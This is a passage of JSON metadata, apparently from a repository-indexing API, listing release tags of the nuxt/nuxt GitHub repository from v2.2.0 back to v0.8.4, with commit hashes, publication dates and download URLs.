nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/